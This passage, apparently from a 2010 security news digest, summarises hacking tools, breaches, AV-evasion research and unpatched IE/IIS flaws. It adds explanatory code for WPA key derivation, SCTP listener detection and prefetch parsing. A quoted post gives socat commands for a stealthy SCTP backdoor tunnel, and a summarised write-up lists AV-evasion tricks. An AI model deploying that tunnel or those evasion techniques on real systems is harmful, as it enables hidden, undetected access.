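    k_server = server.shared_secret(client.public)
    client.discard()
    server.discard()
    return k_client, k_server
```

What an eavesdropper keeps is `client.public` and `server.public`; turning those into `z` is the discrete-logarithm problem in the group, and the signing key, which in a real handshake only vouches for the server's value, is no help with it. Contrast a static RSA key exchange, where the same private key that authenticates the server also decrypts every recorded session.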

 
WAYBACK WEBAPP HACKING  [www.room362.com]
Archive.org allows you to check the history of sites and pages, but a service most are not aware of is one that allows you to get a list of every page that Archive.org has for a given domain. This is great for enumerating web applications; many times you'll find parts of web apps that have been long forgotten (and usually vulnerable).
This module doesn't make any requests to the targeted domain, it simply outputs a list to the screen/or a file of all the pages it has found on Archive.org.

 
THC-IPV6  [freeworld.thc.org]
Last update 2010-12-26
A complete tool set to attack the inherent protocol weaknesses of IPv6 and ICMP6, including an easy to use packet factory library.
Download the current version here:
thc-ipv6-1.4.tar.gz

 
Hello!
I hope you had nice fun with Nessus bridge, but here's the OpenVAS bridge.
It is one of the PoC codes for my upcoming talk tomorrow at BerlinSides: http://www.berlinsides.org/node/14

 
This plugin sends Growl messages to OS X systems running Growl when a session is created and when a session is shut down. Each message will contain information about the session it is reporting on. Do make sure to configure your Growl application to receive the messages and set a password: to do this go to Preferences -> Growl -> Network and select 'Listen for incoming connections' and 'Allow remote application registration', and set the password in the password field; after this go to General and stop and start Growl so the settings will take effect. If the notification will be a remote one you will have to open UDP port 9887.

 
Blackbuntu Community Edition 0.1  [security-sh3ll.blogspot.com]
Linux Live-CD based on Ubuntu 10.10 which was specially designed for security training students and practitioners of information security.

 
What is pyrit?  [forum.intern0t.net]
Pyrit allows you to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time trade-off. Exploiting the computational power of many-core and other platforms through ATI-Stream, Nvidia CUDA, OpenCL and VIA Padlock, it is currently by far the most powerful attack against one of the world's most used security protocols.
WPA/WPA2-PSK is a subset of WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate the following traffic. This "shortcut" eases deployment of WPA/WPA2-protected networks for home and small-office use at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; these ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog.
The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operating system and x86, alpha, arm, hppa, mips, powerpc, s390 and sparc processors.
Setting Up Pyrit With CUDA Capabilities
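To make the "pre-computable" part of the description concrete, here is an added example (not Pyrit's code, and not from the page) of the two WPA/WPA2-PSK derivation steps as specified in IEEE 802.11i: the master key (PMK) is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt and 4096 iterations, and only depends on passphrase and SSID, which is exactly why it can be tabulated ahead of time per SSID; the per-session key (PTK) additionally mixes in both MAC addresses and both handshake nonces, so it cannot. The MAC addresses and nonces below are constructed sample values; the PMK test vector ("password" / "IEEE") is the one published in the standard's Annex H.

```python
"""WPA/WPA2-PSK key derivation: the precomputable PMK and the per-session PTK."""
import hashlib
import hmac


def wpa_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    Only the passphrase and the SSID go in, so for a given SSID the whole
    4096-iteration cost can be paid once per candidate passphrase and stored.
    A unique SSID makes any table built for common SSIDs worthless.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) concatenated."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK plus the 4-way-handshake parameters.

    Returns the 64-byte (TKIP-length) PTK; CCMP uses the first 48 bytes.
    Because the nonces are fresh for every association, this step cannot be
    precomputed: the attacker's cost is in wpa_pmk(), not here.
    """
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)


def split_ptk(ptk):
    """KCK (MIC key), KEK (key-wrap key) and TK (temporal key) for CCMP."""
    return {"kck": ptk[0:16], "kek": ptk[16:32], "tk": ptk[32:48]}


if __name__ == "__main__":
    # IEEE 802.11i Annex H test case 1
    print(wpa_pmk("password", "IEEE").hex())
    # Constructed sample handshake parameters (not captured traffic)
    ap, sta = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    an, sn = b"\xaa" * 32, b"\xbb" * 32
    pmk = wpa_pmk("password", "IEEE")
    print({k: v.hex() for k, v in split_ptk(wpa_ptk(pmk, ap, sta, an, sn)).items()})
```

For a defender the takeaway is the asymmetry between the two functions: the only inputs under the network owner's control that raise the attacker's cost are passphrase length/entropy (more candidates) and a non-default SSID (no reusable table), whereas everything in wpa_ptk() is public in the handshake.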




Funny


 

 

 
Web Service Details: LUHNChecker  [webservices.seekda.com]
Validates credit cards to ensure proper input. This is a FREE CDYNE service run off of our secure servers.

 
Garfield and Santa  [www.gocomics.com]

 

 
TSA fun  [media3.washingtonpost.com]

 
no comment  [i.imgur.com]

 
Worst hurdle race ever  [www.noob.us]

 

 
Incident handling  [imgs.xkcd.com]

 
A man is dating three women  [img822.imageshack.us]

 
This is a letter sent in by a Cleveland Browns season ticket holder in 1974 to management asking them to please terminate other fans from making paper airplanes out of the programs and sailing them around the stadium. You'll poke your eye out! The reply back is something no company would have the cojones to do now.
They don't make 'em like they used to. Go Cleveland!

Thursday, 23 December 2010

Security Weekly News 23 December 2010 - Summary

Some of you might like the following article I put together last week:
http://securityconscious.blogspot.com/2010/12/migitating-isp-disruption.html

You should not be using IE, in general, but because of this New Internet Explorer vulnerability affecting all versions of IE if you do, now you have yet another reason to switch to Firefox + NoScript and if you are paranoid enough: Firefox + NoScript + RequestPolicy :). Just switching to another browser without security extensions won't really cut it because of this: Expanding the Attack Surface.

Feedback and/or contributions to make this better are appreciated and welcome

Highlighted quotes of the week:

"A slogan for Information Security: "The more you know, the less you trust." - Dino A. Dai Zovi
"Dear web developer, exporting personal data of Irish citizens outside EU is not OK, it is against the law Data Protection Act" - Brian Honan
"Sandboxes are like WAFs - either they get bypassed or people just get pwned through stuff the sandbox/WAF allows anyway" - Stefan Esser
"With Sandboxing in play one needs at least 3 exploits, not two. 1 memcorruption + 1 infoleak + 1 sandbox escape." - Stefan Esser
"Ok so out of 16000 passwords on scrollwars 3000 people have ones which couldn't be cracked in less than 30 mins. Not too good." - Martin Bos
"So lemme get this straight. Assange leaked 2k + cablegates but now he is pissed that someone leaked the file on his rape case?" - Martin Bos
"Dear reporters: Quantum Crypto has real problems with unexpected attacker controlled input. Raw photons riskier than packets!" - Dan Kaminsky


To view the full security news for this week please click here (Divided in categories, There is a category index at the top): The categories this week include (please click to go directly to what you care about): Hacking Incidents / Cybercrime, Unpatched Vulnerabilities, Software Updates, Business Case for Security, Web Technologies, Network Security, Cloud Security, Privacy, Mobile Security, Cryptography / Encryption, General, Tools, Funny

Highlighted news items of the week (No categories):

Not patched: IIS 7.5 0-Day DoS (processing FTP requests), New Internet Explorer vulnerability affecting all versions of IE

Updated/Patched: MySQL 5.5 released, Microsoft withdraws flawed Outlook update, Microsoft releases Security Essentials 2, Opera 11.00 has been released!, Google updates Chrome Beta & Dev channels, Secunia releases PSI version 2.0, Back door in HP network storage solution - Update, Oracle Unveils Oracle VM VirtualBox 4.0, When a smart card can root your computer (OpenSC patches)


 
The length of time between when a developer writes a vulnerable piece of code and when the issue is reported by a software security testing process is vitally important. The more time in between, the more effort the development group must expend to fix the code. Therefore the speed and frequency of the testing process, whether going with dynamic scanning, binary analysis, pen-testing, static analysis, line-by-line source code review, etc., matters a great deal.

 
The Cost of Insecurity 2010  [www.quantainia.com]
2010 has been notable for a number of reasons: the advent of a coalition government in the UK, followed by swingeing spending cuts, and a turbulent economic picture. In a regulatory sense, too, 2010 stands out: increasingly active regulators have increased fines for organisations which are found to have failed to comply with basic levels of protection around data. A new record was set with the £17.5 million FSA fine on Goldman Sachs. Moreover, the emphasis has broadened, rather than the ICO and FSA focusing solely on the financial sector: both Hertfordshire County Council and A4E were the subject of fines for weak controls around personal data. At the same time, other regulation continues to apply; many organisations are struggling with PCI-DSS compliance, not only in the commercial sector, but also in the state sector, where cards are important for covering payments for basic services.

 
We recently met with leaders from the U.S. financial services sector, and they asked a number of questions about recent trends in insider threat activities. We are often asked these types of questions, and we can answer many of them right away. Others require more extensive data mining in our case database. In this entry, we address the following question:
Between current employees, former employees, and contractors, is one group most likely to commit these crimes?
The answer to this question has some important implications, and not just for these particular meeting attendees. If, across all types of incidents and all sectors, the vast majority of incidents are caused by current, full-time employees, organizations may focus on that group to address the vulnerability. If, on the other hand, there are a large number of part-time contractors or former employees, there may be different controls that an organization should consider using.

 
Debora Plunkett, head of the NSA's Information Assurance Directorate, has confirmed what many security experts suspected to be true: no computer network can be considered completely and utterly impenetrable - not even that of the NSA.
'There's no such thing as 'secure' any more,' she said to the attendees of a cyber security forum sponsored by the Atlantic and Government Executive media organizations, and confirmed that the NSA works under the assumption that various parts of their systems have already been compromised, and is adjusting its actions accordingly.




Cloud Security highlights of the week


 
The Cloud Security Alliance's matrix is a controls framework that gives a detailed understanding of security concepts and principles that are aligned to the CSA's 13 domains
The Cloud Security Alliance (CSA) has launched a revision of the Cloud Controls Matrix (CCM). The new matrix (version 1.1), available for free download here, is designed to provide fundamental security principles to guide cloud vendors and help prospective cloud customers assess the overall security risk of a cloud provider.
The matrix provides a controls framework that gives a detailed understanding of security concepts and principles that are aligned to the CSA's 13 domains. The foundations of the CCM rest on its customized relationship to other industry-accepted security standards, regulations, and controls frameworks such as ISO 27001/27002, ISACA COBIT, PCI, and NIST. The latest version includes more thorough mapping around NIST and GAAP, as part of more 'holistic guidance', according to CSA.

 
Malware Persistence in the Cloud  [fasthorizon.blogspot.com]
The cloud is certainly going to change some things about malware infection. When a desktop is reset to clean state every time an employee logs in, you now have to wonder how malicious attackers are going to maintain persistent access to the Enterprise. This is similar to what happens when an infected computer is re-imaged only to end-up infected all over again.
There are several ways to maintain persistent access without having an executable-in-waiting on the filesystem. Memory-only based injection is an old concept. It has the advantage of defeating disk-based security. One common observation is that such malware doesn't survive reboot. That is true in the sense that the malware is not a service or a driver - but this doesn't mean the malware will go away. Stated differently, the malware can still be persistent even without a registry key to survive reboot. This applies to the problem of re-infection after re-imaging (a serious and expensive problem today in the Enterprise) and it also applies to the future of cloud computing (where desktop reset is considered a way to combat malware persistence).




Secure Network Administration highlights of the week (please remember this and more news related to this category can be found here: Network Security):


 
Imagine there is an un-patched Internet Explorer vuln in the wild. While the vendor scrambles to dev/test/QA and prime the release for hundreds of millions of users (I've been there... it takes time), some organizations may choose to adjust their defensive posture by suggesting things like, "Use an alternate browser until a patch is made available".
So, your users happily use Firefox for browsing the Internet, thinking they are safe from any IE 0dayz... after all, IE vulnerabilities only affect IE, right? Unfortunately, the situation isn't that simple. In some cases, it is possible to control seemingly unrelated applications on the user's machine through the browser.

 
Ever tested some of the more exotic transport protocols?
SCTP is interesting ... multihoming means you can have several IPs involved on each side of a connection (association in SCTP speak) ... so when you move from wired to wireless your ssh session is still fine. If you find a proper SCTP ssh, of course.
Testing it on Ubuntu LTS, though, using socat for glue... a listening SCTP socket is invisible in netstat -ln. Fun. TCP, UDP and raw sockets are visible ... but SCTP isn't.
socat SCTP-LISTEN:8080,fork TCP-CONNECT:localhost:22
Nice, stealthy backdoor. Does not show in netstat(8) or ss(8). Combine with socat TCP-LISTEN:2223 SCTP-CONNECT:localhost:8080 on a remote host and we have a completely stealthy tunnel, if the firewall is mildly clue-challenged.
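The gap the post describes is in the tools, not the kernel: SCTP endpoints are still exported under /proc/net/sctp/eps, which netstat and older ss never read. The following is an added detection example (not from the post) that parses that file, flags listening endpoints, and maps a listener's socket inode back to the owning PID through /proc/<pid>/fd. The column layout (ENDPT, SOCK, STY, SST, HBKT, LPORT, UID, INODE, LADDRS...) is assumed from the kernel's net/sctp/proc.c, the SST value 10 for a listening socket is TCP_LISTEN, and the sample text is constructed to mirror the socat listener on port 8080 above.

```python
"""List SCTP endpoints from /proc/net/sctp/eps and flag listeners."""
import os

# Column layout assumed from the Linux kernel's net/sctp/proc.c:
#   ENDPT  SOCK  STY  SST  HBKT  LPORT  UID  INODE  LADDRS...
TCP_LISTEN = 10  # sk_state of a listening socket (same numbering as TCP)

# Constructed sample (not real output): one listener on 8080, one bound but
# non-listening endpoint owned by uid 1000.
SAMPLE_EPS = """\
 ENDPT     SOCK   STY SST HBKT LPORT   UID INODE LADDRS
ffff88003b1a2000 ffff88003b1a0000 2   10  0    8080  0   22765 0.0.0.0
ffff88003b1a3000 ffff88003b1a1000 2   7   1    9000  1000 22801 127.0.0.1
"""


def parse_sctp_eps(text):
    """Return one dict per endpoint line; header and malformed lines are skipped."""
    endpoints = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 8 or fields[0] == "ENDPT":
            continue
        try:
            state, port = int(fields[3]), int(fields[5])
            uid, inode = int(fields[6]), int(fields[7])
        except ValueError:
            continue
        endpoints.append({
            "port": port,
            "listening": state == TCP_LISTEN,
            "uid": uid,
            "inode": inode,
            "addrs": [a.lstrip("*") for a in fields[8:]],  # '*' marks a primary address
        })
    return endpoints


def sctp_listeners(text):
    """Only the endpoints a 'netstat -ln' user would expect to see."""
    return [ep for ep in parse_sctp_eps(text) if ep["listening"]]


def pid_for_inode(inode):
    """Walk /proc/<pid>/fd looking for 'socket:[inode]'; None if not found."""
    target = "socket:[%d]" % inode
    for pid in filter(str.isdigit, os.listdir("/proc")):
        fd_dir = os.path.join("/proc", pid, "fd")
        try:
            for fd in os.listdir(fd_dir):
                if os.readlink(os.path.join(fd_dir, fd)) == target:
                    return int(pid)
        except OSError:  # process exited or not ours to inspect
            continue
    return None


def main():
    path = "/proc/net/sctp/eps"
    if not os.path.exists(path):
        print("no SCTP endpoints (sctp module not loaded)")
        return
    with open(path) as fh:
        for ep in sctp_listeners(fh.read()):
            print("SCTP listener port=%d uid=%d addrs=%s pid=%s"
                  % (ep["port"], ep["uid"], ",".join(ep["addrs"]),
                     pid_for_inode(ep["inode"])))


if __name__ == "__main__":
    main()
```

Newer iproute2 releases add an SCTP listing option to ss, but on a host where it is absent the /proc file is the authoritative source, and the inode-to-PID step is what turns "something is listening" into "this process is listening". A one-line check with the same effect is whether /proc/net/sctp/eps exists at all on a host that has no business speaking SCTP.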

 
Recently I've been presenting about 'Wi-Fi (In)Security' at the GOVCERT.NL Symposium 2010 in Rotterdam (November 2010) and (a reduced version) at the 4th CCN-CERT meeting in Madrid (in Spanish; December 2010). The full presentation can be found on Taddong's lab web page. My main goal was to create awareness about all the still prevalent Wi-Fi vulnerabilities, threats, and security risks we are facing both on the wireless infrastructure and the client side. It is almost year 2011, and there is a general feeling that our Wi-Fi environments are pretty secure, as we already have WPA2-Enterprise with multiple authentication methods based on 802.1x/EAP to choose from. However, there are still lots of things to be aware of, especially on the client side (including laptops and mobile devices).
On the infrastructure side, in the best case scenario, we will end up with two worlds, the secure one, based on WPA2-PSK/Enterprise, and the insecure one, based on open Wi-Fi networks (e.g. hotspots). This is also reflected in the Wi-Fi Alliance roadmap, and it is their goal for 2014 (yes, 3 years from now!).

 
Avoiding AV Detection  [spareclockcycles.org]
As a follow-up to my post on the USB Stick O' Death, I wanted to go a little more in depth on the subject of AV evasion. Following my release of (some of) my code for obfuscating my payload, it became apparent that researchers at various antivirus companies read my blog (Oh hai derr researchers! Great to have you with us! I can haz job?) and updated their virus definitions to detect my malicious payload. To be perfectly honest, I was hoping this would happen, as I figured it would be a teachable moment on just how ineffective current approaches to virus detection can be, give readers a real world look at how AV responds to new threats, and provide one of the possible approaches an attacker would take to evading AV software. My main goal in this research was to see how much effort it would take to become undetectable again, and the answer was 'virtually none'.
In this post, I will first look at how I was able to evade detection by many AV products simply by using a different compiler and by stripping debugging symbols. Then, I will look at how I was able to defeat Microsoft's (and many other AV products') detection mechanisms simply by 'waiting out' the timeout period of their simulations of my program's execution. However, a quick note before we begin: I'm by no means an expert on antivirus, as this exercise was partly to further my understanding of how AV works, and these explanations and techniques are based on my admittedly poor understandings of the technologies behind them. If I mistakenly claim something that isn't true, or you can shed light on some areas that I neglect, please comment. I would love to learn from you.

 
The purpose of this article is to explore the many different forensic artifacts that can be discovered from Windows prefetch files. The first section will briefly cover the prefetch file and the prefetching process. The second section will discuss the forensic value of the prefetch file, specifically the forensic artifacts the prefetch file contains, and the story that can be revealed by the mere existence or absence of prefetch files. The article will conclude with some examples of how you can use prefetch files to aid in forensic analysis and what to watch out for when using prefetch files to prove or disprove a case.
The main purpose of this article is to explain the use of prefetching in forensic analysis, but it is important to have a baseline understanding of the technology to provide a good foundation for how and why prefetch files contain certain artifacts. The prefetching process utilized by Microsoft was created to speed up the Windows operating system and application startup. The prefetching process occurs when the operating system, specifically the Windows Cache Manager, monitors certain elements of data that are extracted from the disk into memory. This monitoring occurs each time the system is started for the first two minutes of the boot process, then sixty seconds after all the Win32 services have completed their startup, and the first ten seconds after an application is executed.
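The artifacts the article goes on to discuss (executable name, last run time, run count) sit in the fixed header of the .pf file, so they can be pulled with a few struct calls. The following is an added example, not code from the article, of a minimal header parser for the Windows XP (version 17) and Vista/7 (version 23) layouts. The field offsets are assumed from public documentation of the format; Windows 8 (version 26) stores eight run times and Windows 10 (version 30) compresses the file, and neither is handled here. The sample file bytes are constructed, not taken from a real system, and the name check at the end illustrates the "what to watch out for" point: the executable name embedded in the header should agree with the file's own name.

```python
"""Minimal parser for Windows XP (v17) and Vista/7 (v23) prefetch headers."""
import struct
from datetime import datetime, timedelta, timezone

# Header offsets assumed from public format documentation (libscca):
#   0  uint32 version, 4 "SCCA", 12 file size, 16 UTF-16 executable name (60 bytes),
#   76 prefetch hash; then the version-specific file-information block.
LAYOUT = {
    17: {"last_run": 120, "run_count": 144, "size": 152},
    23: {"last_run": 128, "run_count": 152, "size": 240},
}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME is 100-ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_prefetch(data):
    """Return the header artifacts of a v17/v23 prefetch file as a dict."""
    if len(data) < 84:
        raise ValueError("too short to be a prefetch file")
    version, signature, _, file_size = struct.unpack_from("<I4sII", data, 0)
    if signature != b"SCCA":
        raise ValueError("missing SCCA signature")
    if version not in LAYOUT:
        raise ValueError("unsupported prefetch version %d" % version)
    if len(data) < LAYOUT[version]["size"]:
        raise ValueError("truncated file-information block")
    name = data[16:76].decode("utf-16-le").split("\x00", 1)[0]
    pf_hash = struct.unpack_from("<I", data, 76)[0]
    last_run = struct.unpack_from("<Q", data, LAYOUT[version]["last_run"])[0]
    run_count = struct.unpack_from("<I", data, LAYOUT[version]["run_count"])[0]
    return {
        "version": version,
        "file_size": file_size,
        "executable": name,
        "hash": "%08X" % pf_hash,
        "last_run": filetime_to_datetime(last_run),
        "run_count": run_count,
    }


def name_matches_filename(record, pf_filename):
    """A .pf file is named EXECUTABLE-HASH.pf; a mismatch deserves a closer look."""
    stem = pf_filename.rsplit(".", 1)[0]
    return stem.rsplit("-", 1)[0].upper() == record["executable"].upper()


def build_sample(version, name, last_run_ft, run_count, pf_hash=0x1A2B3C4D):
    """Constructed sample header (not a real prefetch file) for testing the parser."""
    size = LAYOUT[version]["size"]
    buf = bytearray(size)
    struct.pack_into("<I4sII", buf, 0, version, b"SCCA", 0x11, size)
    encoded = name.encode("utf-16-le")
    buf[16:16 + len(encoded)] = encoded
    struct.pack_into("<I", buf, 76, pf_hash)
    struct.pack_into("<Q", buf, LAYOUT[version]["last_run"], last_run_ft)
    struct.pack_into("<I", buf, LAYOUT[version]["run_count"], run_count)
    return bytes(buf)


if __name__ == "__main__":
    # 129375360000000000 is the FILETIME for 2010-12-23 00:00:00 UTC (constructed)
    sample = build_sample(23, "CALC.EXE", 129375360000000000, 7)
    print(parse_prefetch(sample))
    print(name_matches_filename(parse_prefetch(sample), "CALC.EXE-1A2B3C4D.pf"))
```

The run count and last run time are the two values most often used to place an execution on a timeline; remember that the header holds only the most recent run on these versions, and that the absence of a .pf file proves nothing on systems where prefetching is disabled (servers, SSD installs with the service turned off).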




Secure Development highlights of the week (please remember this and more news related to this category can be found here: Web Technologies):


 
Unencrypted public wifi should die  [lcamtuf.blogspot.com]
Unencrypted public access wireless networks are an unbelievably harmful technology devised with no regard for the operation of the modern web - and they introduce far more problems than are immediately apparent. The continued use of unencrypted wifi at the municipal level and in consumer-oriented settings is simply inexcusable, even if all the major websites on the Internet can be pressured into employing HTTPS-only access and Strict Transport Security by default.
Straightforward snooping and cute tricks such as sslstrip aside - all of them still deadly effective, by the way - there are many less obvious problems we simply can't solve any time soon:

 
How to Conceal XSS Injection in HTML5  [samuli.hakoniemi.net]
I was playing around with the window.history object. In general, it's quite limited and can be considered rather useless. However, HTML5 brings some new methods to the History object in order to make it more powerful.
In this article I will take a quick glance at a quite peculiar method called pushState(). There is one security related issue I want to point out, which I consider rather harmful.
history.pushState()
history.pushState() was introduced in HTML5 and it's meant for modifying history entries.
By using pushState() we're allowed to alter the visible URL in the address bar without reloading the document itself. Sounds a bit risky, doesn't it?

 
Once you have deployed ModSecurity, you have probably been faced with this question:
How should I configure my Web Application Firewall (WAF) to handle Authorized Vulnerability Scanning (AVS) traffic?
The answer to this question is not quite as easy as it may first appear. This question arises when organizations are running their own internal web application vulnerability scans. They soon realize that they need to figure out how to get their security tools (scanner and WAF) to 'play nice' with each other.
Before deciding on how to reconfigure ModSecurity with regards to handling the scanning traffic, you first must confirm the goal of your scanning efforts. There are usually two main scanning goals:
* To identify all vulnerabilities within a target web application, or
* To identify all vulnerabilities within a target web application that are remotely exploitable by an external attacker.
You may want to reread the second item to make sure that you understand the difference, as it is factoring in the exploitability of a vulnerability in a production web application.

 
Attack and Defense Labs  [blog.andlabs.org]
Cracking hashes in the JavaScript cloud with Ravan
Password cracking and JavaScript are very rarely mentioned in the same sentence. JavaScript is a bad choice for the job for two primary reasons: it cannot run continuously for long periods without freezing the browser, and it is way slower than native code.
HTML5 takes care of the first problem with WebWorkers; now any website can start a background JavaScript thread that can run continuously without causing stability issues for the browser. That is one hurdle passed.
The second issue of speed is becoming less relevant with each passing day as the speed of JavaScript engines is increasing at a greater rate than the increase of system speed. It might surprise most people how fast JavaScript actually is: 100,000 MD5 hashes/sec on an i5 machine (Opera). That's the best number I could get from my system; in most cases it would vary between 50,000 - 100,000 MD5 hashes/sec. This is still about 100-115 times slower than native code on the same machine, but that's alright. What JavaScript lacks in outright speed can be more than made up for by its ability to distribute.

 
What's wrong with OpenID?  [www.quora.com]
It boggles my mind that this is apparently a big question for techies and, to me, is a perfect example of the Silicon Valley mindset that doesn't understand how to build products that real people want to use.
The short answer is that OpenID is the worst possible 'solution' I have ever seen in my entire life to a problem that most people don't really have. That's what's 'wrong' with it.
To answer the most immediate question of 'isn't having to register and log into many sites a big problem that everyone has?,' I will say this: No, it's not. Regular normal people have a number of solutions to this problem. Here's some of them:

 
Google and other search engines have been used for many purposes such as finding useful information, important websites and the latest news on different topics. Google indexes a huge number of web pages, and that number is growing daily. From the security perspective these indexed pages may contain various sensitive information.
Google hacking involves using advanced operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications.




Finally, I leave you with the secure development featured article of the week courtesy of OWASP (Development Guide Series):

Identify interconnections in the Applications environment


- Identify all the interconnections to the application, such as through a corporate intranet, the internet or a business partner connection, and the associated access controls:

  • administrative interfaces or portals separate from normal user application access
  • web service access from other applications or over business partner connections
  • database connections from this application, as well as connections from other applications if the database is shared

- Additionally, access to other applications needs to be considered if you plan to redirect a user to another application (internal or external) or use an iframe to present content from another site in your application. All these communications should be considered for how the application will be deployed so that the proper secure access can be built into the design. This includes the proper ingress and egress ports to be opened externally, to business partners over MPLS or IPSec VPNs, or internally on your own network.

- Least privilege should be exercised at every step in the design and deployment phase. All of the components of the application should be identified, including all the devices that will be supporting the application.




Source: link



Have a great week, weekend and Merry Christmas!.

Security Weekly News 23 December 2010 - Full List


Category Index




Hacking Incidents / Cybercrime


 
Gardai are expected to send a file to the Director of Public Prosecutions (DPP) in the coming weeks following an investigation into the suspected sale by a civil servant of personal information on hundreds of claimants to a private detective.
The civil servant, who was working in the Department of Social Protection, has been suspended and gardai and the Data Protection Commissioner (DPC) have been investigating the incident for a number of weeks.
It is understood the DPC has also raided the private investigator's office and the premises of three insurance firms to gather information on the claimants.

 
SQL Injection Blamed for New Breach  [www.bankinfosecurity.com]
Stronger App Security Could Have Prevented Online Hack
The breach of a Web server that housed payment card data for a New York tourism company's website highlights security gaps in cardholder data protection.
The online breach, which led hackers to cardholder information for 110,000 credit cards, was facilitated via SQL injection -- one of the most frequent modes of attack hackers use to illegally acquire payment-card details.
Twin America LLC (d.b.a., City Sights NY) reportedly discovered the breach in late October, after a programmer noticed unauthorized script had been loaded to the server. The company on Dec. 9 notified the New Hampshire Attorney General of the breach, after it determined that some 300 New Hampshire residents had been impacted by the attack. City Sights' attorney Theodore Augustinos would not comment on the breach, saying he was not authorized to share details beyond those included in the letter to the AG.

 
State-owned Dutch bank ABN Amro has been robbed by computer hackers who stole 5.5 million euros without inside help.
A report in daily about the digital heist is partly denied, however, by the Dutch Association of Banks NVB, which says it is nearly impossible to hack a bank from outside.
Thirteen people have been arrested for the virtual robbery, which took place in March 2010. Sources close to the investigation say that the hackers were able to manipulate the bank's account system, but neither police nor ABN Amro are giving any details.
The hackers transferred the money to an accomplice in the town of Wageningen who piped amounts to accounts in Belgium, Hungary and other countries.
The thirteen, who do not all know each other, have been accused of fraud, theft and money laundering. Police found them by tracing the stolen money. Some 2 million euros have been retrieved by ABN Amro, but the remaining amount is still missing.

 
The U.S. Securities and Exchange Commission has accused an Estonian financial firm and two of its employees of carrying out a fraudulent hacking scheme that netted them at least $7.8 million.
The SEC filed an 'emergency federal court action' against Estonian financial services firm Lohmus Haavel & Viisemann and employees Oliver Peek, 24, and Kristjan Lepik, 28.
The agency accused the two of using a so-called spider program to steal information related to more than 360 embargoed press releases in advance of their official distribution date from news and PR Web site Business Wire.
A statement from the SEC claims the stolen information allowed the two to time their trades around the release of news involving mergers, earnings and regulatory action. Using U.S. accounts, the defendants allegedly bought stocks long or sold short.

 
McDonald's and Walgreens this week revealed that data breaches at partner marketing firms had exposed customer information. There has been a great deal of media coverage treating these and other similar cases as isolated incidents, but all signs indicate they are directly tied to a spate of "spear phishing" attacks against e-mail marketing firms that have siphoned customer data from more than 100 companies in the past few months.

 
Hacked corporate blowers in premium rate phreak caper
Romanian police are claiming success in breaking up a cybercrime ring blamed for losses of more than €11m ($14.6 million) through telecoms call charge fraud.
Raids on Tuesday led to the arrest of 42 suspected members of the gang, reckoned to be led by two Romanians, according to Romanian prosecutors.

 
This week I've taken the opportunity to take a closer look at the current ZeuS campaigns. A few of them keep popping up again and again, so I've tried to get some more information about those botnets, their targets as well as the infrastructure that the cybercriminals are using.
In this first blog post I will talk about a ZeuS botnet which I call the "Bozvanovna Botnet", which is being spread using drive-by exploits (hopefully I will find the time to blog about the other botnets that I've found too...).
First of all, let's take a look at the botnet Command&Control infrastructure: The cybercriminals have registered a pretty big amount of domains to serve ZeuS configs and binaries as well as to provide a dropzone for the infected clients (bots) to upload the stolen information. The reason for this is pretty simple: In most cases the domains that get listed on ZeuS Tracker will get nuked quickly. Then the cybercriminals have to register new domains every time the old domains get suspended.

 
* "No legitimate company will ever cold call to tell you your computer has a problem"
The National Consumer Agency and Microsoft Ireland today warned consumers of a scam where cyber criminals call consumers, claiming to be from Microsoft or other legitimate technology companies to tell them they have a virus on their computer.
The scammers then get people to download a file from a website and gain access to their computers where they can see personal details including financial information. In some cases they also ask for credit card details.

 
Suspect lifted other personal information, as well, from computers storing New York state agency data
In yet another instance of an insider going to the dark side, a subcontractor upgrading software for the State of New York's Office of Temporary Disability Assistance has been arrested for allegedly stealing 15,000 Social Security numbers from computers storing the data for the state agency.
Evan Kane, 25, of Waterford, N.Y., has been charged with forgery, possession of a forged instrument, falsifying records, and identity theft, according to published reports.




Unpatched Vulnerabilities


 
A 0-day exploit has been published at exploit-db (see US-Cert advisory) that takes advantage of a memory corruption vulnerability in IIS 7.5's FTP service. This bug will work pre-authentication.
From the looks of it, it is a pure remote exploit whose chief use would be denial of service. As with any memory corruption bug, it is theoretically possible to use this to gain access to the server with the permissions of the user that is running IIS. I think that would be difficult in this case, but time will tell. It is, nevertheless, a serious bug that at present has no patch. (As of this writing, Microsoft hasn't confirmed it is an issue.)

 
Today we released Security Advisory 2488013 to notify customers of a new publicly-disclosed vulnerability in Internet Explorer (IE). This vulnerability affects all versions of IE. Exploiting this vulnerability could lead to unauthorized remote code execution inside the iexplore.exe process.
Proof-of-concept exploit bypasses ASLR and DEP
The Metasploit project recently published an exploit for this vulnerability using a known technique to evade ASLR (Address Space Layout Randomization) and bypass DEP (Data Execution Prevention).
